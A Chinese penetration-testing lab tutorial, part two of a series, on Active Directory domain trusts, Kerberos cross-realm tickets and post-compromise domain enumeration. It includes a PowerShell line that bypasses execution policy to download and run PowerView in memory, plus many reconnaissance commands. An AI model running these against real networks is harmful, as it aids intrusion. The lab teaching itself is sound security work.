渗透测试靶场(二)

栏目: 编程工具 · 发布时间: 5年前

内容简介:先介绍一下域信任的基本原理,然后第二部分实际操作一下信息的枚举。建立域之间的信任关系在域环境中,建立信任的两个域之间可以互相访问资源,当然,其中需要做一些权限上的设置。

先介绍一下域信任的基本原理,然后第二部分实际操作一下信息的枚举。

0x01 域信任的过程

建立域之间的信任关系

在域环境中,建立信任的两个域之间可以互相访问资源,当然,其中需要做一些权限上的设置。

信任方向(单向或双向)

信任可以是单向或双向的。在双向信任中,任何一方的域都可以访问另一方。在单向信任中 域A信任域B ,这意味着域A是信任域,域B将是可信域。对于某个域中的用户访问另一个域中的资源,该用户需要位于受信任域中。看看下面的图表来了解单向信任:

渗透测试靶场(二)

左边的是HH,右边的是小Wing,HH对小Wing给了权限,将自己托付给他,所以小Wing对HH有了访问的权限,被信任。

AD信任的类型

有各种信任类型。信任可以是传递性的或非传递性的。下表说明了一些类型的信任:

信任类型 属性 信任方向 验证方式 详情
树根节点 Transitive 双向

Kerberos V5 或NTLM

将新树添加到林中时自动创建
父节点-子节点 Transitive 双向

Kerberos V5 或NTLM

添加子域时自动创建
捷径 Transitive

单向或双向

Kerberos V5 或NTLM

手动创建,在林中使用,缩短信任路径以改善身份验证时间

Transitive

单向或双向

Kerberos V5 或NTLM

手动创建。

用于在AD DS和林之间共享资源。

林中的传递信任

信任你具有传递性,例如A信任B,B信任C,那么A信任C

自动信任

默认情况下,添加子域的时候会创建双向的信任,两种信任类型是父子信任和根信任。

下面是一张可视化的跨越信任边界的Kerberos原理的图片:

渗透测试靶场(二)

TGT就是一种特殊票证,Ticket Granting Ticket,允许客户端在同一Kerberos域中获取其他Kerberos票证,当客户端向密钥分发中心(KDC)发送票证请求时,KDC为客户端创建TGT(使用客户端密码作为密钥,进行加密)并将加密的TGT发回给客户端。然后,客户端尝试使用其密码解密TGT。如果客户端成功解密TGT(即,如果客户端提供了正确的密码),它将保留解密的TGT,这是客户端的身份证明。

TGT允许客户端获得额外的票证(如TGS),这些票证允许你访问特定的服务。

TGS:TGS代表 票据授权服务 。TGS是KDC的一个组件,它在客户端请求与Kerberos服务的连接时发出服务票证。客户需要有一个有效的TGT,然后才会向它发出TGS。

域之间的TGT:在林间信任的情况下,得到域间信任的TGT后,用这个TGT向另外一个信任域请求TGS,信任域使用信任密码验证后,生产TGS返回客户端。

上面这个图解释一下:

  • DC1 的 Client从DC1请求TGT
  • DC1 用TGT响应(krbtgt hash)
  • Client再请求TGS
  • Client请求DC2,但是当前域并找不到服务器,因此它使用Inter-realm TGT回应客户端
  • DC2返回的是用账户的hash加密的TGS
  • 客户端再用TGS去请求服务器

这个过程安全客有师傅写过了。

建立信任的认证范围

创建域信任的时候,会让你选择范围:

林范围的身份验证: 如果我们使用林范围的身份验证,则外部林中的用户与属于本地林的用户具有相同级别的本地林资源访问权限。

选择性身份验证: 如果是选择性身份验证,则需要在域中的每台计算机上手动分配权限,以及希望第二个林中的用户有权访问的资源。

0x02 示例

首先要正确配置dns。

打开DNS管理器

先设置允许区域传送

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

显示了网域资料,ok。

进行域信任设置

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

渗透测试靶场(二)

可以利用SID属性将子域的权限升级到根域。

完成后可以设置一些目录权限

渗透测试靶场(二)

渗透测试靶场(二)

0x03 枚举

  • AD是用LDAP作为访问协议
  • AD是通过DNS作为定位服务,方便找到域内其他主机。
  • AD数据库是NTDS.DIT

powershell内存加载

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain”

先生成一个ps payload,假设我们取得一个目标的权限。

渗透测试靶场(二)

基础命令

一些基本的信息收集命令,下面的命令请用域用户登陆靶机,不然没权限。

ipconfig /all

渗透测试靶场(二)

可以判断出pentestlab.com就是DC。

whoami /all

渗透测试靶场(二)

本地的组

net localgroup

渗透测试靶场(二)

显示本地管理员

net localgroup "administrators"

渗透测试靶场(二)

检查开放端口

netstat -an

渗透测试靶场(二)

详细查看进程

tasklist /V

渗透测试靶场(二)

系统信息

systeminfo

查看定时任务

schtasks /query /fo LIST /v

查看补丁情况

wmic qfe get Caption,Description,HotFixID,InstalledOn

渗透测试靶场(二)

常用的网络命令

arp -a

渗透测试靶场(二)

显示域名:

echo %USERDOMAIN%

渗透测试靶场(二)

打印域控制器名称:

echo %logonserver%

渗透测试靶场(二)

域用户列表

net user /domain

渗透测试靶场(二)

打印AD域密码策略:

net accounts /domain

渗透测试靶场(二)

AD信任关系:

nltest /domain_trusts

渗透测试靶场(二)

Active Directory PowerShell模块收集信息

这个模块是微软自己家的,好处在于可以减少被AV识别到的风险,以及在PCL模式下也可以使用,但是只有windows server 2008 r2以上才支持。

以下是一些常用的命令示例。

有关AD用户的信息:

Get-ADUser -Filter *

渗透测试靶场(二)

渗透测试靶场(二)

查询域中所有的组详细信息

Get-ADGroup  -Filter *

渗透测试靶场(二)

过滤器可以自己选择

Get-ADGroup -Filter {Name -like "*admin*"} | select name, GroupScope

就是显示管理员组

获取当前域信息

Get-ADDomain

渗透测试靶场(二)

显示有关AD Forest的信息

Get-ADFroest

渗透测试靶场(二)

信任域的所有信息

Get-ADTrust -Filter *

渗透测试靶场(二)

使用Powerview枚举

渗透测试靶场(二)

获取域内机器

Get-NetComputer

渗透测试靶场(二)

域控信息

Get-NetDomainController

渗透测试靶场(二)

组信息

Get-NetGroup

渗透测试靶场(二)

session信息

Get-NetSession

渗透测试靶场(二)

ACL信息

Get-ObjectAcl

渗透测试靶场(二)

查看访问权限

Find-LocalAdminAccess -Verbose

渗透测试靶场(二)

枚举管理员组成员

Invoke-EnumerateLocalAdmin -Verbose

渗透测试靶场(二)


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

我++

我++

威廉·J·米切尔 / 刘小虎等 / 中国建筑工业出版社 / 2006-6 / 50.00元

随着《我++——电子自我和互联城市》(Me++:The Cyborg Self And The Networked City)的出版,《比特之城》(City Of Bits)和《E-托邦》(E-topia)的作者完成了一套检验信息技术在日常生活中之衍生的非正式三部曲。威廉·J·米切尔描述了自马可尼以后的百年间无线技术的发展变化:网络的不断扩大,发送和接受装置的不断缩小。正如他所说,这就像“大人国重......一起来看看 《我++》 这本书的介绍吧!

MD5 加密
MD5 加密

MD5 加密工具

SHA 加密
SHA 加密

SHA 加密工具

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具